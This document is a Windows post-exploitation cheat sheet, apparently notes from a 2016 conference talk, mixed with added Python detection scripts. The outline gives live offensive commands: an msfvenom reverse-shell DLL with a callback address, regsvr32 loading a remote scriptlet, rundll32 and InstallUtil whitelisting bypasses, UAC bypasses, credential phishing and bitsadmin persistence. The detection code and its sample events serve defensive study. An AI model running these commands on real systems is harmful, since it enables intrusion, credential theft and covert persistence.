Summary
Main post-exploitation activities
- Proxy
- Bypass Application Whitelisting
- Escalate Privileges
- Information Gathering
- Persistence
- Detection and Mitigations
Proxy
Port forwarding: client -> lcx, Netsh; HTTP -> Tunnel; Metasploit -> portfwd
SOCKS proxy: client -> EW, XSocks; HTTP -> reGeorg; Metasploit -> socks4a
Other: SSH, ICMP
VPN
Bypass Application Whitelisting
Bypass approaches
- HTA
- Office Macro
- Cpl
- Chm
- Powershell
- Rundll32
- Regsvr32
- Regsvcs
- Installutil
HTA
VBScript
JavaScript
Office Macro
MacroRaptor
https://bitbucket.org/decalage/oletools/wiki/mraptor
DLL/CPL
Generation
payload.dll:
msfvenom -p windows/meterpreter/reverse_tcp -b '\x00\xff' lhost=192.168.127.132 lport=8888 -f dll -o payload.dll
http://drops.wooyun.org/tips/16042
(1) Run the DLL directly: rundll32 shell32.dll,Control_RunDLL payload.dll
(2) Rename the DLL to .cpl and double-click it
(3) An ordinary DLL only needs its extension changed
Chm
Advanced combination techniques for building a perfectly bundled backdoor
http://drops.wooyun.org/tips/14254
Using system CHM files to implement a covert backdoor:
"The Clever Tricks We Played With Over the Years"
Powershell
Command
Lnk
If PowerShell is disabled
Execute PowerShell through .NET
http://blog.msdn.microsoft.com/kebab/2014/04/28/executing-powershell-scripts-from-c/
p0wnedShell
https://github.com/Cn33liz/p0wnedShell
PowerOPS
https://labs.portcullis.co.uk/blog/powerops-powershell-for-offensive-operations/
Rundll32
JavaScript
DLL
http://drops.wooyun.org/tips/11764
Regsvr32
Three ways to launch
regsvr32 /u /n /s /i:payload.sct scrobj.dll
regsvr32 /u /n /s /i:http://ip:port/payload.sct scrobj.dll
Right-click > Register
http://subt0x10.blogspot.jp/2016/04/bypass-application-whitelisting-script.html
http://drops.wooyun.org/tips/15124
Regsvcs
https://gist.github.com/subTee/e1c54e1fdafc15674c9a
Installutil
Compile
InstallUtil.exe /U InstallUtil.exe
http://subt0x10.blogspot.jp/2015/08/application-whitelisting-bypasses-101.html
http://drops.wooyun.org/tips/8862
Executable directories
Scan for writable paths with a PowerShell script
http://go.mssec.se/AppLockerBC
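From the defender's side, every launcher listed in this section (rundll32 Control_RunDLL, regsvr32 with a scriptlet, InstallUtil /U, mshta) is a signed Windows binary whose command line gives it away. The following is an added example, not code from the talk or from any of the projects linked above: a small rule set run over constructed process-creation events. The field layout (Image / CommandLine / ParentImage, tab-separated) is an assumption modelled on Sysmon Event ID 1, and the sample events are constructed.

```python
"""Spot the whitelisting-bypass launch patterns listed above in
process-creation telemetry. Added example, not from the original talk;
the events are constructed and the field layout is an assumption."""
import re
from typing import Callable, Dict, List, Tuple

# Constructed sample events: tab-separated key=value fields.
# Events 1-4 match one rule each; 5 and 6 are ordinary, benign launches.
SAMPLE_EVENTS: List[str] = [
    "Image=C:\\Windows\\System32\\rundll32.exe\tCommandLine=rundll32 shell32.dll,Control_RunDLL C:\\Users\\bob\\AppData\\Local\\Temp\\payload.dll\tParentImage=C:\\Windows\\explorer.exe",
    "Image=C:\\Windows\\System32\\regsvr32.exe\tCommandLine=regsvr32 /u /n /s /i:http://10.0.0.5:8080/payload.sct scrobj.dll\tParentImage=C:\\Windows\\System32\\cmd.exe",
    "Image=C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe\tCommandLine=InstallUtil.exe /logfile= /LogToConsole=false /U C:\\Users\\bob\\evil.exe\tParentImage=C:\\Windows\\System32\\cmd.exe",
    "Image=C:\\Windows\\System32\\mshta.exe\tCommandLine=mshta http://10.0.0.5/a.hta\tParentImage=C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE",
    "Image=C:\\Windows\\System32\\regsvr32.exe\tCommandLine=regsvr32 /s C:\\Program Files\\Vendor\\component.dll\tParentImage=C:\\Program Files\\Vendor\\setup.exe",
    "Image=C:\\Windows\\System32\\rundll32.exe\tCommandLine=rundll32 shell32.dll,Control_RunDLL C:\\Windows\\System32\\main.cpl\tParentImage=C:\\Windows\\explorer.exe",
]


def parse_event(line: str) -> Dict[str, str]:
    """Turn 'Key=Value<TAB>Key=Value' into a dict."""
    fields: Dict[str, str] = {}
    for kv in line.split("\t"):
        key, _, value = kv.partition("=")
        fields[key] = value
    return fields


# Each rule is (name, predicate(image_basename, cmdline, parent_basename));
# all three arguments are lower-cased before the predicate runs.
Rule = Tuple[str, Callable[[str, str, str], bool]]
RULES: List[Rule] = [
    ("regsvr32 scriptlet load (/i: with scrobj.dll or a remote URL)",
     lambda img, cmd, par: img == "regsvr32.exe"
         and ("scrobj.dll" in cmd or re.search(r"/i:https?://", cmd) is not None)),
    ("rundll32 Control_RunDLL pointing outside C:\\Windows",
     lambda img, cmd, par: img == "rundll32.exe" and "control_rundll" in cmd
         and re.search(r"control_rundll\s+c:\\windows\\", cmd) is None),
    ("InstallUtil /U on an assembly under a user profile",
     lambda img, cmd, par: img == "installutil.exe"
         and re.search(r"(^|\s)/u(\s|$)", cmd) is not None and "\\users\\" in cmd),
    ("mshta fetching a remote HTA or spawned by an Office application",
     lambda img, cmd, par: img == "mshta.exe"
         and (re.search(r"https?://", cmd) is not None
              or par.startswith(("winword", "excel", "powerpnt")))),
]


def detect(events: List[str]) -> List[Dict[str, str]]:
    """Return one alert dict per (event, rule) match, in event order."""
    alerts: List[Dict[str, str]] = []
    for line in events:
        ev = parse_event(line)
        img = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
        par = ev.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
        cmd = ev.get("CommandLine", "").lower()
        for name, pred in RULES:
            if pred(img, cmd, par):
                alerts.append({"rule": name, "image": img, "parent": par,
                               "cmdline": ev.get("CommandLine", "")})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a['rule']}] {a['image']} <- {a['parent']}: {a['cmdline']}")
```

The two benign events (a vendor installer registering its own DLL, Explorer opening a Control Panel applet under C:\Windows) produce no alert, which is the point of keying the rules on the argument path and the parent rather than on the binary name alone; the same rules carry over to AppLocker or EDR command-line telemetry once the field names are adjusted.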
Escalation
Common privilege escalation methods
- Local privilege escalation vulnerabilities
- Service-based escalation
- Protocol-based escalation
- Phishing
本地提权
A script that determines which vulnerabilities are present from the installed patch numbers
https://github.com/GDSSecurity/Windows-Exploit-Suggester
Export the victim machine's systeminfo to a file
systeminfo > 1.txt
Use the script to identify the vulnerabilities present
python windows-exploit-suggester.py --database 2016-05-31mssb.xls --systeminfo ~/Desktop/1.txt
The exploit may be caught by anti-virus
Port the exploit to PowerShell
http://evi1cg.me/archives/MS16-032-Windows-Privilege-Escalation.html
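The same systeminfo dump that feeds the exploit suggester is also what a defender uses for patch-compliance checks. The following is an added example, not code from the talk or from Windows-Exploit-Suggester: it parses the Hotfix(s) block of a saved systeminfo file and reports which required updates are absent. The systeminfo excerpt and the bulletin-to-KB table are constructed placeholders (the KB numbers are not real update identifiers); a real table would come from Microsoft's bulletin data, which is what the suggester's .xls file holds.

```python
"""Check a saved `systeminfo` dump for missing security updates. Added
example, not from the original talk or from Windows-Exploit-Suggester;
the excerpt and the bulletin-to-KB table below are constructed placeholders."""
import re
from typing import Dict, List, Set

# Constructed excerpt of `systeminfo > 1.txt` (real output has many more rows).
SAMPLE_SYSTEMINFO = """\
Host Name:                 VICTIM-PC
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB1111111
                           [02]: KB2222222
                           [03]: KB3333333
Network Card(s):           1 NIC(s) Installed.
"""

# Constructed table: bulletin -> KB that closes it on this OS. Placeholder
# KB numbers; MS16-032 is the bulletin named on the page, the other is invented.
REQUIRED_PATCHES: Dict[str, str] = {
    "MS16-032": "KB1111111",          # placeholder KB
    "EXAMPLE-BULLETIN": "KB4444444",  # placeholder bulletin and KB
}

HOTFIX_LINE = re.compile(r"\s+\[\d+\]:\s*(KB\d+)", re.IGNORECASE)


def field(text: str, name: str) -> str:
    """Value of a 'Name:   value' row, or '' if the row is absent."""
    m = re.search(rf"^{re.escape(name)}:\s*(.*)$", text, re.MULTILINE)
    return m.group(1).strip() if m else ""


def installed_hotfixes(text: str) -> Set[str]:
    """KB identifiers listed under the Hotfix(s) row (empty set for 'N/A')."""
    kbs: Set[str] = set()
    in_list = False
    for line in text.splitlines():
        if line.startswith("Hotfix(s):"):
            in_list = True
            continue
        if in_list:
            m = HOTFIX_LINE.match(line)
            if not m:
                break  # the indented [nn]: list has ended
            kbs.add(m.group(1).upper())
    return kbs


def missing_patches(text: str, required: Dict[str, str]) -> List[str]:
    """Bulletins whose KB is not in the installed set, sorted by name."""
    have = installed_hotfixes(text)
    return sorted(b for b, kb in required.items() if kb.upper() not in have)


if __name__ == "__main__":
    print("OS:", field(SAMPLE_SYSTEMINFO, "OS Version"))
    print("Installed:", sorted(installed_hotfixes(SAMPLE_SYSTEMINFO)))
    print("Missing:", missing_patches(SAMPLE_SYSTEMINFO, REQUIRED_PATCHES))
```

A host that reports "Hotfix(s): N/A" (common when WMI is broken or the run is unprivileged) yields an empty installed set, so every required bulletin is reported missing; treat that as "unknown, verify another way" rather than as confirmed exposure.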
Service-based escalation
Common services: MSSQL, MySQL, Oracle, FTP
Third-party services: DLL hijacking, file hijacking
Escalation script: PowerUp
https://drops.wooyun.org/tips/11989
Protocol-based escalation
Abuse known Windows issues to obtain local privilege escalation -> Potato
It uses NTLM relaying (especially HTTP -> SMB relay) together with NBNS spoofing to escalate
http://tools.pwn.ren/2016/01/17/patato-windows.html
Phishing
msf ask module
exploit/windows/local/ask
Uses runas to lure the user into clicking through the UAC prompt, which yields the highest privileges
msf script that needs to be modified
metasploit/lib/msf/core/post/windows/runas.rb
Information Gathering
LaZagne
mstsc (RDP) connection history
Browser history
Local user passwords
Local WiFi SSIDs and WiFi passwords
Recently opened files on the host
Host system info
Certificates!
Installed Programs: Startup Items
Installed Services: Security Services, File/Printer Shares, Database Servers, Certificate Authority
Sensitive Data: Key-logging, Screen capture, Network traffic
User Information
System Configuration: Password Policy, Security Policies, Configured Wireless Networks and keys
Keylogging
Screen recording
NetRipper
Phishing for passwords
Pop up an authentication prompt via script
https://github.com/Ridter/Pentest/blob/master/note/Powershell_MSFCapture.md
msf module
post/windows/gather/phish_windows_credentials
Bypass UAC
- Use the IFileOperation COM interface
- Use Wusa.exe extract
- Inject shellcode remotely into a puppet process
- DLL hijacking: hijack a system DLL file
- Escalate straight past UAC
- Phishing http://evi1cg.me/archives/Powershell_Bypass_UAC.html
- http://www.powershellempire.com/?page_id=380
Fileless attacks
PowerShell
JSRat
mshta
SCT
WSC
Persistence
- Startup items
- Registry
- WMI
- at
- schtasks
- Hijack an existing third-party service
- bitsadmin
Detection
bitsadmin /list /allusers /verbose
Stop the Background Intelligent Transfer Service
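The bitsadmin listing above is only useful if someone reads it, and on a busy host it is long. The following is an added example, not code from the talk: a parser for the verbose job listing that pulls out owner, transfer source and destination, and the notification command line, then flags the combination that distinguishes a persistence job from routine update traffic. The sample output is constructed to approximate bitsadmin's verbose layout (the real tool prints more rows per job), and the three heuristics are assumptions a defender would tune to their environment.

```python
"""Parse `bitsadmin /list /allusers /verbose` output and flag jobs that look
like persistence rather than ordinary update traffic. Added example, not
from the original talk; the output below is constructed and only
approximates bitsadmin's verbose layout."""
import re
from dataclasses import dataclass, field
from typing import List, Tuple

# Constructed sample: one ordinary update job and one job that matches the
# bitsadmin persistence pattern (download into a user profile plus a
# notification command line that runs when the transfer completes).
SAMPLE_OUTPUT = r"""
BITSADMIN version 3.0
BITS administration utility.

GUID: {11111111-2222-3333-4444-555555555555} DISPLAY: 'VendorUpdate'
TYPE: DOWNLOAD STATE: TRANSFERRED OWNER: NT AUTHORITY\SYSTEM
PRIORITY: NORMAL FILES: 1 / 1 BYTES: 4096 / 4096
NOTIFY INTERFACE: UNREGISTERED NOTIFICATION FLAGS: 3
JOB FILES:
    4096 / 4096 WORKING https://download.example.com/update.bin -> C:\ProgramData\Vendor\update.bin
NOTIFICATION COMMAND LINE: none

GUID: {aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee} DISPLAY: 'sync'
TYPE: DOWNLOAD STATE: TRANSFERRED OWNER: VICTIM-PC\bob
PRIORITY: NORMAL FILES: 1 / 1 BYTES: 512 / 512
NOTIFY INTERFACE: UNREGISTERED NOTIFICATION FLAGS: 3
JOB FILES:
    512 / 512 WORKING http://10.0.0.5/s.txt -> C:\Users\bob\AppData\Roaming\s.txt
NOTIFICATION COMMAND LINE: C:\Windows\System32\cmd.exe /c C:\Users\bob\AppData\Roaming\s.exe

Listed 2 job(s).
"""


@dataclass
class BitsJob:
    guid: str
    display: str
    owner: str = ""
    state: str = ""
    notify_cmd: str = ""
    files: List[Tuple[str, str]] = field(default_factory=list)  # (source, destination)


JOB_HEADER = re.compile(r"GUID:\s*(\{[0-9A-Fa-f-]+\})\s+DISPLAY:\s*'([^']*)'")
FILE_ROW = re.compile(r"\s+\d+ / \d+ \S+ (\S+) -> (.+)$")


def parse_jobs(text: str) -> List[BitsJob]:
    """Split the listing into jobs; a job starts at each 'GUID: ... DISPLAY:' row."""
    jobs: List[BitsJob] = []
    cur = None
    for line in text.splitlines():
        m = JOB_HEADER.match(line)
        if m:
            cur = BitsJob(guid=m.group(1), display=m.group(2))
            jobs.append(cur)
            continue
        if cur is None:
            continue  # banner lines before the first job
        if line.startswith("TYPE:"):
            s = re.search(r"STATE:\s*(\S+)", line)
            o = re.search(r"OWNER:\s*(.*)$", line)
            cur.state = s.group(1) if s else ""
            cur.owner = o.group(1).strip() if o else ""
        elif line.startswith("NOTIFICATION COMMAND LINE:"):
            cur.notify_cmd = line.partition(":")[2].strip()
        else:
            f = FILE_ROW.match(line)
            if f:
                cur.files.append((f.group(1), f.group(2).strip()))
    return jobs


def suspicious_jobs(jobs: List[BitsJob]) -> List[Tuple[BitsJob, List[str]]]:
    """Return (job, reasons) for every job that trips at least one heuristic."""
    findings: List[Tuple[BitsJob, List[str]]] = []
    for job in jobs:
        reasons: List[str] = []
        if job.notify_cmd.lower() not in ("", "none"):
            reasons.append("notification command line set: " + job.notify_cmd)
        for src, dst in job.files:
            if re.match(r"https?://\d+\.\d+\.\d+\.\d+", src):
                reasons.append("source is a bare IP address: " + src)
            low = dst.lower()
            if "\\appdata\\" in low or "\\temp\\" in low:
                reasons.append("destination inside a user profile: " + dst)
        if reasons:
            findings.append((job, reasons))
    return findings


if __name__ == "__main__":
    for job, reasons in suspicious_jobs(parse_jobs(SAMPLE_OUTPUT)):
        print(f"{job.guid} '{job.display}' owner={job.owner} state={job.state}")
        for r in reasons:
            print("   -", r)
```

Of the three heuristics, a non-empty notification command line is the strong one: legitimate update agents register a COM callback, not a command to spawn, so that field alone is worth an alert regardless of where the file lands. Stopping the BITS service, as the slide notes, removes the trigger but leaves the job definition in the queue; the job still has to be cancelled explicitly.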
References
WooYun White Hat Conference 2016, ShellIsOnlyTheBeginning, 3gstudent, evi1cg